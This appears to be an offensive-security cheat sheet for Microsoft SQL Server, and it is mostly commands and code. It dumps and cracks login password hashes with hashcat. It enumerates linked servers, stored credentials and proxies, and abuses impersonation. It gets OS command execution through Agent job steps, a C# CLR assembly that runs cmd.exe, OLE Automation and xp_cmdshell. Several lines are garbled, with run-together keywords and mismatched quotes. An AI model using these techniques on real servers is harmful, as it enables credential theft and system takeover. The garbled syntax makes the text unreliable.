MS SQL
SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output FROMmaster.sys.sql_logins; Linked Servers
-- query for linked servers
SELECT name, data_source, provider_string, catalogFROM sys.serversWHERE is_linked = 1;
-- Execute via open Query
SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM DatabaseName.SchemaName.TableName');
-- Direct query execute
SELECT * FROM [LinkedServerName].[DatabaseName].[SchemaName].[TableName];SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output
FROM master.sys.sql_logins;hashcat -m 1731 password_hash.txt pass --username -OProxies
-- check for credentials:
select * from msdb.sys.credentials;
-- check for setup proxies:
select * from msdb.dbo.sysproxies;Linked Servers:
-- query for proxies
SELECT p.name AS ProxyName, c.name AS CredentialName FROM msdb.dbo.sysproxies p
JOIN sys.credentials c ON p.credential_id = c.credential_id;Impersonation
-- check for impersonation
SELECT grantee_principal.name AS Grantee, grantor_principal.name AS Grantor, p.class_desc, p.permission_name, p.state_desc
FROM sys.database_permissions pJOIN sys.database_principals grantee_principal ON p.grantee_principal_id = grantee_principal.principal_id
JOIN sys.database_principals grantor_principal ON p.grantor_principal_id = grantor_principal.principal_id
WHERE p.type = 'IMPERSONATE';
-- Execute query
EXECUTE AS USER = 'username';
SELECT CURRENT_USER AS ImpersonatedUser;Code Execution:
Agents:
-- query Agents (Requires SA)
USE msdb;
GOSELECT j.job_id AS JobID, j.name AS JobName, j.enabled AS IsEnabled, j.description AS JobDescription, j.date_created AS DateCreated, j.date_modified AS DateModified, s.name AS OwnerName, c.name AS CategoryName, j.originating_server AS OriginatingServer
FROM sysjobs j
INNER JOIN syscategories c ON j.category_id = c.category_id
INNER JOIN syslogins s ON j.owner_sid = s.sid
ORDER BY j.name;
-- Add job step
EXEC msdb.dbo.sp_add_jobstep
@job_name = N'JobName',
@step_name = N'Xnjsdf',
@subsystem = N'PowerShell', -- can also be
command = N'whoami > C:\Temp\whoami.txt',
Proxies:
-- Stored credentials
select name, create_date, credential_identity as credential, modify_date from msdb.sys.credentials;
-- Add system proxy
EXEC msdb.dbo.sp_add_proxy @proxy_name = 'proxyName', @credential_name = 'CredentialName', @enabled = 1;
-- System Proxies
SELECT p.proxy_id,p.name AS ProxyName,c.name AS CredentialName,p.enabled FROM msdb.dbo.sysproxies AS p JOIN msdb.sys.credentials AS c ON p.credential_id = c.credential_id;
-- delete proxy
EXEC msdb.dbo.sp_delete_proxy @proxy_name = 'ProxyName';
-- Query What has actions have been assigned to a proxy
USE msdb;
SELECT p.name AS ProxyName, s.subsystem AS SubsystemName FROM dbo.sysproxies p
JOIN dbo.sysproxysubsystem ps ON p.proxy_id = ps.proxy_id
JOIN dbo.syssubsystems s ON ps.subsystem_id = s.subsystem_id
WHERE p.name = N'ProxyName';
-- assign powershell permissions to agent
EXEC msdb.dbo.sp_grant_proxy_to_subsystem
@proxy_name = N'ProxyName',
@subsystem_id = 12;
-- 1: ActiveScripting (VBScript, JScript)
-- 2: CmdExec
-- 8: Transact-SQL
-- 9: ANSISQL
-- 11: SSIS
-- 12: PowerShell
-- Add Job Step
EXEC msdb.dbo.sp_add_jobstep
@job_name = N'JobName',
@step_name = N'StepName',
@subsystem = N'CmdExec’, -- or PowerShell
@command = N'whoami > C:\Temp\whoami.txt',
@proxy_name = N'ProxyName'; -- Use the created proxy
Common Language Runtime:
-- check
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- enable CLR
EXEC sp_configure 'clr enabled', 1; RECONFIGURE;Create DLL in visual studio:
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
public class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void RunCmd(string command)
{
Process proc = new Process();
proc.StartInfo.FileName = "cmd.exe";
proc.StartInfo.Arguments = "/c " + command;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
SqlContext.Pipe.Send(proc.StandardOutput.ReadToEnd());
proc.WaitForExit();
proc.Close();
}
}Upload and execute code:
CREATE ASSEMBLY RunCmdAssembly
FROM 'C:\Path\To\Your\Assembly\RunCmdAssembly.dll'
WITH PERMISSION_SET = EXTERNAL_ACCESS;
CREATE PROCEDURE RunCmd
@command NVARCHAR(4000)
AS EXTERNAL NAME RunCmdAssembly.StoredProcedures.RunCmd;
EXEC RunCmd ‘CMD';Object Linking and Embedding (OLE):
-- check configuration
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- enable OLE
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
--Execute OLE command
DECLARE @ole INT, @hr INT;
DECLARE @cmd NVARCHAR(4000), @output NVARCHAR(4000);
EXEC @hr = sp_OA Create 'WScript.Shell', @ole OUT;
IF @hr <> 0
PRINT 'Error Creating OLE Object’;
SET @cmd = 'cmd /c dir’;
EXEC @hr = sp_OAMethod @ole, 'Exec', NULL, @cmd;
IF @hr <> 0
PRINT 'Error Executing Command’;
EXEC @hr = sp_OADestroy @ole;
IF @hr <> 0
PRINT 'Error Destroying OLE Object';XP_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'dir';Last updated